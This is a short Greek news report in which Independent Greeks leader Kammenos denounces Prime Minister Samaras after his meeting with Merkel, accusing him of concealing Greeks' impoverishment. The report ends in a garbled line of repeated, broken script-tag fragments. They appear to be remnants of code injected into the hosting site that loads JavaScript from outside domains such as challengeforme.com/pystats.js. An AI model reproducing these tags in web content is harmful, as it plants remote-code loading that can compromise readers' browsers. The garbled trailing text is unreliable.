Καμμένος: Ο πρωθυπουργός απέκρυψε την εξαθλίωση των Ελλήνων

Για το τελευταίο αντίο ενός προσκυνημένου πολιτικού έκανε λόγο ο πρόεδρος των Ανεξάρτητων Ελλήνων σχολιάζοντας τη συνάντηση Μέρκελ – Σαμαρά…

Δριμεία κριτική του προέδρου των Ανεξάρτητων Ελλήνων κατά του πρωθυπουργού Αντώνη Σαμαρά μετά τη συνάντηση του τελευταίου με την καγκελάριο της Γερμανίας Άγκελα Μέρκελ.

“Ο πρωθυπουργός, αφού ανέπτυξε, ακόμα μια φορά, στα πλαίσια της πολιτικής εικονικής πραγματικότητας, το success story μιας άλλης χώρας, αφού απέκρυψε την αλήθεια, δηλαδή την εξαθλίωση του ελληνικού λαού, προκειμένου να παλέψει για την πολιτική του επιβίωση, υπέβαλε τα σέβη του στην εμπνεύστρια της καταστροφικής πολιτικής για την πατρίδα μας.

Αυτό είναι το τελευταίο αντίο ενός προσκυνημένου πολιτικού”, σημείωσε ο πρόεδρος των Ανεξάρτητων Ελλήνων αναφερόμενος στη συνάντηση Μέρκελ – Σαμαρά.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >